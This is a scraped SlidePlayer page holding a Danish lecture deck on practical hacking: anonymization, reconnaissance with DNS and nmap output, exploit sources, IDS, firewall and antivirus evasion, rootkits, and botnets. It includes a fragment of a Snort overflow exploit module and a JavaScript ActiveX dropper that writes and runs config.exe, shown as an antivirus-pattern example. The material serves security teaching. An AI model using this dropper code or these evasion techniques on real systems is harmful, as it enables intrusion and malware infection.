IT Arkitektur og Sikkerhed Praktisk Hacking. Praktisk hacking Indhold  Sløring  Rekognoscering  Exploits / sårbarheder  Kompromittering  Sløring.

Slides:



Advertisements
Lignende præsentationer
SPBG.  Test driven development  Unit test frameworks  MOSS TDD  Mocking  Design patterns.
Advertisements

VIS HJÆLPELINJER SOM ER EN HJÆLP VED PLACERING AF LOGO: 1.Højreklik på den aktuelle side og vælg ’gitter og hjælpelinjer’ 2. Sæt kryds ved ’Vis’ tegnehjælpelinjer.
Overskrift her Navn på oplægsholder Navn på KU- enhed For at ændre ”Enhedens navn” og ”Sted og dato”: Klik i menulinjen, vælg ”Indsæt” > ”Sidehoved / Sidefod”.
Indsæt nyt billede: Format: B 254 x 190,5 mm Efter indsættelse, højreklik på billedet og placér det bagerst. Delete det gamle foto Legal aid in Denmark.
Teknik og Miljø - Planlægning og Byggeri Aarhus Kommune •Flemming Meyer •Master of Law, Special Consultant •Municipality of Aarhus •Department of employment.
Indsæt nyt billede: Format: B 254 x 190,5 mm Efter indsættelse, højreklik på billedet og placér det bagerst. Delete det gamle foto New production system.
Informationer om trådløs netværk På trådløs netværk bruges CSMA/CA sammen med ”Request to Send (RTS)” og “Clear to Send (CTS)” for at undgå kollisioner.
1 | 2011 Gymnasielærerdag fra ungdomsuddannelse til videregående...
Drupal[.org] Open Source CMS 6/
Mozilla ● Open source ● Web browser ● Mail klient ● Organisation ● Fremtiden... Henrik Gemal – Mozilla Evangelist - gemal.dk/mozilla.
Dagens program  Emne: Tim Berners-Lees WWW koncept og deraf følgende innovationer Forbered hver for sig Præsenter og diskutér i grupper Fremlæggelse med.
SPU-modellen (Struktureret ProgramUdvikling)
ITera HA - High Availability and real-time Disaster Recovery Nye anvendelsesområder for en High Availability løsning Soft Design seminar, Gl. Avernæs,
Firewalls & netsikkerhed Henrik Størner,
Select one of the 3 title pages and delete the others. Please do not create new title pages by using the layouts Title 1 – 3 as these layouts do not contain.
Lone Møller Sørensen Director, SBi, Aalborg University ECTP- Denmark A national platform for Denmark
SMALL BUSINESS er BIG BUSINESS ISA Workshop Rico Raja, Technology Specialist Brian Thumann Madsen, Senior Executive Consultant.
Projektledelse IT-projektledelse (ITP) Projektledelse og Produktion af Digitalt Indhold (DPI) Projektledelse IT-projektledelse (ITP) Projektledelse og.
13 – Database med JDBC. 2 NOEA2009Java-kursus – JDBC JDBC JDBC er et standard bibliotek til at tilgå relational databaser API’et er en standardiseret.
MAXIFUELS: Second generation bioethanol technology Birgitte K. Ahring.
Arne Winther Et værdifuldt samarbejde mellem hospital og produktudvikler.
Computer netværk og TCP/IP protokoller Kort resume – uge 6
Problemer med at bruge tympanometri? Slagelse og Middelfart okt.-nov
View Procedures Trigger og Function Jesper Tørresø DAB1 E07 1. november 2007.
Portfolio. Portfolio – what? Portfolio is used in more ways –Product or presentation –Process –Learning –Evaluation Often we distinguish between a learning.
Grundforløbsprojekt Strøm, Styring & IT.
CodeIgniter Database Brugerinput Form Validation 20101JFH.
Algoritmer og Datastrukturer 1 Greylisting Gerth Stølting Brodal.
Centre of Research in Childhood Health Syddansk Universitet1 Is sports participation protective of back pain in childhood? An interim analysis from a prospective.
Database Normalization without Mathmatics
Udvikling med Microsoft 2007 Office System Michell Cronberg Microsoft MVP, MCT, MCAD ISV Innovation Day 2006 ServerServer.
Udvikling med Microsoft 2007 Office System Michell Cronberg Microsoft MVP, MCT, MCAD ISV Innovation Day 2006 KlientKlient.
Microsoft Solutions for Management Peter Colsted Direktør Enterprise & Partner Group Microsoft Danmark.
Representations for Path Finding in Planar Environments.
Projektledelse IT-projektledelse (ITP) Projektledelse IT-projektledelse (ITP) Lektion september 2004 Peter Olaf Looms.
Selected Partner Network briefing – d. 17. september 2008 How to Sell? Licensiering Jon Meldgaard Hansen - LMM, SMS&P How to Sell – september 2008.
Technology Briefing. Hvorfor snakker vi drift? Meget fokus fra Microsoft på effektiv drift Dynamic Systems Initiative MS Operations Framework Meget fokus.
Litteratursiden / forfattere / anmeldelser / analyser / lister / temaer / læseklubber / video / brugere Digital communication of performance literature.
CUSTOMER JOURNEYS 12/9.
Introduktion til.NET- platformen og version 2.0 Michell Cronberg Microsoft MVP
Web service - elementer SOAP (Simple Object Access Protocol) WSDL (Web Service Description language) UDDI (Universal Description, Discovery and Integration)
Web service - elementer SOAP (Simple Object Access Protocol) WSDL (Web Service Description language) UDDI (Universal Description, Discovery and Integration)
COMPONENT ARCHITECTURE FOR THE ENTERPRISE Bjarne Schytte Country Manager BEA Systems The Enterprise Middleware Solution “Open Networks 99”
Familien på Internettet Er du sikker på internettet - Er dit barn.
Ændr 2. linje i overskriften til AU Passata Light 30 SEPTEMBER 2014 DEIC CONFERENCE 2014 PHD STUDENT MATTEO PILATI AARHUS UNIVERSITY DEPARTMENT OF CULTURE.
Presentation 27: Comparison of technologies Objektorienteret Middleware.
Overskrift 40/42 pkt, Maks 2 linjer Underoverskrift, 14/16 pkt For at vise hjælpelinjer: 1.Højreklik på slidet og vælg “Gitter og hjælpelinjer” 2.Kryds.
Agenda 1.Informationer 1.Excel i fb.m. projekt 2 2.Reserver tid til projekt 2 3.Øvelse: a / b = c 2.Opsamling fra sidst 3.Estimation (konfidensintervaller)
Velkommen til Datamatikkeruddannelsen Roskilde Handelsskole Advanced Computer Study.
Virus scan af Unix mail Historie Scannere til Unix Lidt om SMTP DKUUG’s setup –virus scan –spam scan –adresse check.
KLAR TIL NYE MULIGHEDER
Erfaringer og dialog omkring transforms AFP/PDF/AFP AFP Brugergruppemøde Maj 2012 Jørgen Ulrich.
Tekstslide i punktform Rubrik, helst 1 linje Brug ”Forøg/Formindsk indryk” for at få de forskellige niveauer frem Danish Standards  Signe Annette Boegh.
Working for you. Ivan Grønning, Sun Chemical Kemiens Dag, 23 November 2013 REACH Manufacturer/Importer the Registrant.
Grunde til at jeg elsker dig
Intro Evaluering De sidste to gange?. HTTP, cookies og sessions Forelæsning nr 10 Tilbage til trafikken mellem server – client Sende HTTP-request og respons.
Sikker og integreret infrastruktur Peter Colsted Direktør Enterprise & Partner Group Microsoft Danmark.
Fremstilling af Simple WEB steder [ITPL] Foråret 2004
IT Arkitektur og Sikkerhed Praktisk Hacking. Hvem er jeg Hvem er Jørgen Hjort? Senior sikkerhedskonsulent og CISSP hos Ezenta Har arbejdet med IT sikkerhed.
Kjeld Svidt  Institut for Byggeri og Anlæg  Aalborg Universitet IT i Byggeriet Semester 6, kursusgang Databaser (1) Kjeld Svidt
Intro Evaluering De sidste to gange?. HTTP, cookies og sessions Forelæsning nr 10 Tilbage til trafikken mellem server – client Sende HTTP-request og respons.
OPERATIONEL ANALYSE AF WEBADFÆRD OAW – LEKTIONSGANG 4.
Algoritmer og Datastrukturer 1 DAIMI Greylisting Gerth Stølting Brodal Aarhus Universitet.
ANALYSE AF WEBADFÆRD - OAW OAW – LEKTIONSGANG 4. ANALYSE AF WEBADFÆRD - OAW SUMMARY, LECTURE 3 (Extended) Common Log File Format Host, Ident, Authuser,
Mikkel deMib Svendsen Duplicate Content & Multiple Site Issue Mikkel deMib Svendsen
Compositional Design Principles “SemiCiv”
F-Secure Teknik – derfor
AIDA Reinsurance Working Party Meeting
Algoritmer og Datastrukturer 1
CS 3800 Switch/Router Lab Project Introduction
Præsentationens transcript:

IT Arkitektur og Sikkerhed Praktisk Hacking

Praktisk hacking Indhold  Sløring  Rekognoscering  Exploits / sårbarheder  Kompromittering  Sløring af indtrængning  Ekstraktion af oplysninger  Konsolidering af adgang

Overordnet forløb Målrettede hackere Fritidshackere eller hackere der bruger hackede maskiner som platform (f.eks. til spam eller afpresning) Find målmaskiner Find exploits Hack maskiner Find maskiner Find exploits Hack maskiner

Praktisk hacking Sløring  Proxyer  Åbne Access Points (wifi)  Anonymiserende netværk (tor, hushmail)  Hackede computere For ikke at afsløre sit udgangspunkt, og dermed sig selv, benytter man typisk mellemstationer.

Praktisk hacking (sløring) Proxyer

Praktisk hacking (sløring) Åbne Access Points

Praktisk hacking (sløring) Tor

Praktisk hacking Rekognoscering  Offentlige oplysninger (netcraft, google hacking, dns, ripe)  Aktiv (nmap, nessus)  Passiv (trådløs sniffning) Der er flere forskellige måder at finde sine mål på.

Praktisk hacking (rekognoscering) Ripe opslag $ host is an alias for tintin.itu.dk. tintin.itu.dk has address bin/whois?searchtext= &submit=Search: inetnum: netname: FSKNET descr: Danish Network for Research and Education descr: UNI-C descr: DK-2800 Lyngby country: DK admin-c: unic1-ripeunic1-ripe tech-c: unic1-ripeunic1-ripe status: ASSIGNED PA remarks: Details of IP-adresses of selected institutions are remarks: available at ITU: IT-Højskolen i København

Praktisk hacking (rekognoscering) DNS opslag $ host -l itu.dk ns.itu.dk … videokonf.itu.dk has address vpn.itu.dk has address vpnpriv.itu.dk has address webcal.itu.dk is an alias for tintin.itu.dk. webfaktura.itu.dk is an alias for tintin.itu.dk. webmail.itu.dk is an alias for pluto.itu.dk. whaddayouthinkyouredoingyoubastard.itu.dk has address wolverine.itu.dk has address is an alias for tintin.itu.dk. www1.itu.dk has address wwwadm.itu.dk is an alias for ssh.itu.dk. xcvs.itu.dk has address ypserver.itu.dk is an alias for asterix.itu.dk. itu.dk SOA ns.itu.dk. hostmaster.itu.dk $

Praktisk hacking (rekognoscering) Netcraft

Praktisk hacking (rekognoscering) Google Hacking

Praktisk hacking (rekognoscering) nmap # nmap -sS -sV test.xxx.dk Starting nmap 3.93 ( ) at :29CET Interesting ports on : (The 1662 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 Debian-1ubuntu2 (protocol 2.0) 25/tcp open smtp Postfix smtpd 80/tcp open http Apache httpd ((Ubuntu)PHP/ ubuntu4.1) 143/tcp open imap Courier Imapd (released 2004) 993/tcp open ssl OpenSSL 3306/tcp open mysql MySQL _Debian-3ubuntu2.1-log MAC Address: 00:80:AD:00:49:9E (Cnet Technology) Service Info: Host: mail.rhave.dk Nmap finished: 1 IP address (1 host up) scanned in seconds

Praktisk hacking (rekognoscering) nmap ping-sweep # nmap -sP /23 Starting nmap 3.75 ( ) at :49 CET Host seems to be a subnet broadcast address (returned 1 extra pings). Host appears to be up. Host rogue.itu.dk ( ) appears to be up. Host ns2.itu.dk ( ) appears to be up. Host tarzan.itu.dk ( ) appears to be up. Host superman.itu.dk ( ) appears to be up. Host tintin.itu.dk ( ) appears to be up. Host hulk.itu.dk ( ) appears to be up. Host hydra.itu.dk ( ) appears to be up. Host appears to be up. Host appears to be up. Host r2d2.linuxlab.dk ( ) appears to be up. Host c3po.linuxlab.dk ( ) appears to be up. Host nightcrawler.itu.dk ( ) appears to be up. Host vpnpriv.itu.dk ( ) appears to be up. Host wolverine.itu.dk ( ) appears to be up. Host pluto.itu.dk ( ) appears to be up. Host appears to be up. Host seems to be a subnet broadcast address (returned 1 extra pings). Host appears to be up.

Praktisk hacking (rekognoscering) nmap ping-sweep Host dkm.itu.dk ( ) appears to be up. Host sigchi.itu.dk ( ) appears to be up. Host dialogical.itu.dk ( ) appears to be up. Host hug.itu.dk ( ) appears to be up. Host doi.itu.dk ( ) appears to be up. Host ds.itu.dk ( ) appears to be up. Host abs.itu.dk ( ) appears to be up. Host gamestudies.itu.dk ( ) appears to be up. Host hit.itu.dk ( ) appears to be up. Host battlefield.itu.dk ( ) appears to be up. Host rmj1.itu.dk ( ) appears to be up. Host colossus.itu.dk ( ) appears to be up. Host cogain.itu.dk ( ) appears to be up. Host xcvs.itu.dk ( ) appears to be up. Host bigwig.itu.dk ( ) appears to be up. Host tlb.itu.dk ( ) appears to be up. Host ea.itu.dk ( ) appears to be up. Host whaddayouthinkyouredoingyoubastard.itu.dk ( ) appears to be up. Host abacus.itu.dk ( ) appears to be up. Host bpl2.itu.dk ( ) appears to be up. Host lacomoco.itu.dk ( ) appears to be up. Host intifada.itu.dk ( ) appears to be up. Host logosphere.itu.dk ( ) appears to be up. Nmap run completed IP addresses (41 hosts up) scanned in seconds

Praktisk hacking Exploits / sårbarheder Kilder til exploits  Offentlige sites / mailinglister (frsirt.com, securityfocus.com, full-disclosure, secunia.dk)  Egenudvikling (hårdt arbejde)

Praktisk hacking (exploits) Offentlige hjemmesider

Praktisk hacking (exploits) Egenudvikling af sårbarheder Der er en række metoder til at finde sårbarheder i programmer:  Sourcekode auditering  Binær auditering  Fuzzing

Praktisk hacking (exploits) Egenudvikling af sårbarheder ret ebp (esp)... var_28

Praktisk hacking Kompromittering  Direkte angreb  Firewalls  IDS (og IPS)  Indirekte angreb mod klientsårbarheder (f.eks. IE-exploits)  Personlige firewalls der blokerer udadgående trafik  Antivirus (mønstergenkendelse => ændrer mønster)

Praktisk hacking (kompromittering) Firewalls Firewalls er en moden teknologi, der er rigtigt gode til at udføre deres funktion. Det er hovedsageligt DoS angreb der findes i moderne produkter, de sjældne gange det sker.  DoS angreb  Fragment angreb  Flood angreb Det kan typisk være nødvendigt at benytte andre angrebsmetoder (f.eks. indirekte angreb) hvis ordentlige firewalls blokerer den direkte vej.

Praktisk hacking (kompromittering) Intrusion Detection Systemer (IDS) Problemet med IDS er detektion, men IDS er heldigvis typisk mønsterbaseret, og kan derfor omgås.  Modifikation af kendte exploits kan gøre at de går igennem udetekteret  Fragmentering kan narre IDS  Fejl i IDS kan lede til crash, send ’disable’-pakker før rigtigt angreb

Praktisk hacking (kompromittering) Snort Advisory ID : FrSIRT/ADV CVE ID : CVE Rated as : Critical Remotely Exploitable : Yes Locally Exploitable : Yes Release Date : CVE Critical Technical Description A vulnerability has been identified in Snort, which could be exploited by remote attackers to execute arbitrary commands. This flaw is due to a stack overflow error in the Back Orifice pre-processor when determining the direction (to or from server) of a specially crafted UDP packet, which could be exploited by remote unauthenticated attackers to compromise a vulnerable system or network monitored by Snort. Affected Products Snort versions through 2.4.2

Praktisk hacking (kompromittering) Snort Snort Back Orifice Pre-processor Remote Buffer Overflow Exploit (Win32) Date : 25/10/2005 Advisory : FrSIRT/ADV FrSIRT/ADV Rated as : Critical Critical ############################################### # for educational purpose only # by Kira ############################################### package Msf::Exploit::snort_bo_overflow_win32; use base 'Msf::Exploit'; use strict; use Pex::Text; my $holdrand; my $advanced = {}; my $info = { 'Name' => 'Snort Back Orifice Preprocessor Overflow', 'Version' => '$Revision: 1.0 $', 'Authors' => [ 'Trirat Puttaraksa (Kira) ', ], 'OS' => ['win32', 'win2000', 'winxp', 'win2003'],

Praktisk hacking (kompromittering) Personlige firewalls Typisk mindre software firewalls der kun beskytter en enkelt maskine  Beskytter også mod udadgående trafik  Hovedsageligt kun brugt på Windows maskiner, hvilket gør det nemmere at få data ud fra Linux/Unix/BSD maskiner Flere måder at omgå disse på:  Piggybacking på tilladte programmer  Send data fra lave netværkslag (NDIS)

Praktisk hacking (kompromittering) Zonealarm ZoneAlarm Personal Firewall Program Control Feature Bypass Secunia Advisory:SA17450 Release Date: Critical:Not criticalNot critical Impact:Security Bypass Where:Local system Solution Status:Unpatched Software:ZoneAlarm Anti-Spyware 6.x ZoneAlarm Antivirus 6.x ZoneAlarm Internet Security Suite 6.x ZoneAlarm Pro 6.x Description: Debasis Mohanty has discovered a weakness in various ZoneAlarm products, which can be exploited to bypass security features provided by the product. The weakness is caused due to the Program Control feature failing to correctly identify and stop processes that use the Internet Explorer browser to make outgoing connections via the "ShowHTMLDialog()" API in MSHTML.DLL. This may be exploited by malware to send potentially sensitive information out from an affected system.ZoneAlarm Anti-Spyware 6.x ZoneAlarm Antivirus 6.x ZoneAlarm Internet Security Suite 6.x ZoneAlarm Pro 6.x …

Praktisk hacking (kompromittering) Antivirus Antivirus programmer kontrollerer typisk filadgang, men baserer sig heldigvis typisk på mønstergenkendelse. Selv små variationer kan narre mange AV produkter.

Praktisk hacking (kompromittering) Eksempel på AV mønster <!-- hide for safe browsers InterfaceObject=document.applets[0]; setTimeout("ownload()",5000); function ownload() { fsoClassID="{0D43FE01-F093-11CF A0C }"; InterfaceObject.setCLSID(fsoClassID); fso = InterfaceObject.createInstance(); windir = fso.getspecialfolder(0); filename = "\\config.exe"; if (fso.FileExists(windir+filename) == false) { file = fso.opentextfile(windir+filename, "2", "TRUE") file.write(FileContent) file.close() setTimeout("Run()",500) } …

Praktisk hacking (kompromittering) Eksempel på AV mønster <APPLET code="com.ms.activeX.ActiveXComponent" WIDTH=0 HEIGHT=0> <!-- hide for safe browsers InterfaceObject=document.applets[0]; setTimeout("ownload()",5000); function ownload() { fsoClassID="{0D43FE01-F093-11CF A0C }"; InterfaceObject.setCLSID(fsoClassID); fso = InterfaceObject.createInstance(); windir = fso.getspecialfolder(0); filename = "\\config.exe"; if (fso.FileExists(windir+filename) == false) { file = fso.opentextfile(windir+filename, "2", "TRUE") file.write(FileContent) file.close() setTimeout("Run()",500) } …

Praktisk hacking Rootkits Efter kompromittering har man typisk brug for en base på den hackede maskine til at udføre det videre arbejde igennem. Til dette benyttes typisk et Rootkit. Basalt set er det blot en teknologi der har til formål at skjule en angribers værktøjer Eksempler:  FU_rootkit (Windows, rootkit.com)  t0rn (Linux)

Praktisk hacking (rootkits) Sløring af indtrængning Rootkits benyttes bl.a. til at skjule:  filer / foldere  netværksforbindelser  processer  logentries

Windows arkitektur Service Control Manager Task Manager NTDLL.DLL Security Reference Monitor Processes & Threads Config Manager(registry) (Kernel mode callable interfaces) I/O Mgr User Mode System ProcessesServicesApplications LSASSExplorer Winlogon User applications Session Manager Services.exe Kernel Mode Device & File Sys Drivers Kernel Hardware Abstraction Layer NTDLL.DLL – User mode rootkit hooks Kernel – Kernel mode rootkit hooks

Praktisk hacking (rootkits) t0rn "The t0rn rootkit replaces several binaries on the system in order to hide itself. Here are the binaries that it replaces:  du  find  ifconfig  in.telnetd  in.fingerd  login  ls  mjy  netstat  ps  pstree  top A setuid shell is placed in /usr/man/man1/man1/lib/.lib/.x"

Praktisk hacking (rootkits) Sony rootkit "I studied the driver’s initialization function, confirmed that it patches several functions via the system call table and saw that its cloaking code hides any file, directory, Registry key or process whose name begins with “$sys$”. " - Mark's Sysinternals Blog (

€45

Praktisk hacking (rootkits) Ekstraktion af oplysninger  Dokumenter  Logs  Gemte password  Mails  …

Praktisk hacking (rootkits) Konsolidering af adgang  Installation af bagdøre  Rootkits

Praktisk hacking (rootkits) Videre brug af maskiner  Spam / open relays  Proxy  DDoS  Distribuerede beregninger

Praktisk hacking Eksempel på bot-net Phpbb include vuln scanning, via Google, generating new IRC botnet (NEW) Published: , Last Updated: :24:27 UTC by Patrick Nolan (Version: 3(click to highlight changes))3(click to highlight changes) We have received two reports of systems being exploited via a phpbb include vulnerability and a "new" IRC bot is installed. Please update your files now. Phpbb forum support guru "Techie-Micheal" points out that "running update_to_latest.php on their install only updates the database (and is clearly stated in the documentation), files need to be updated seperately for which there are several methods". The scanning is for phpbb versions and under. The latest version of phpbb is Micheal also notes "- In past bots, the bots would run as an "SSL'ed Apache. This one is a bit different; my $processo = '/usr/local/firewall'". The new IRC bot scans for vulnerable systems using Google, when successful it announces that "oopz and sirh0t and Aleks g0t pwned u!", and has UDP flooding and UDP/ICMP/TCP scanning capabilities.Phpbb

Praktisk hacking Variationer  Hacking vha. fysisk adgang  …

Og så…  Til gruppe arbejde

Feedback: Fortrolighedspolitik Feedback
Om projektet: SlidePlayer Brugsbetingelser

© 2024 SlidePlayer.dk Inc. All rights reserved.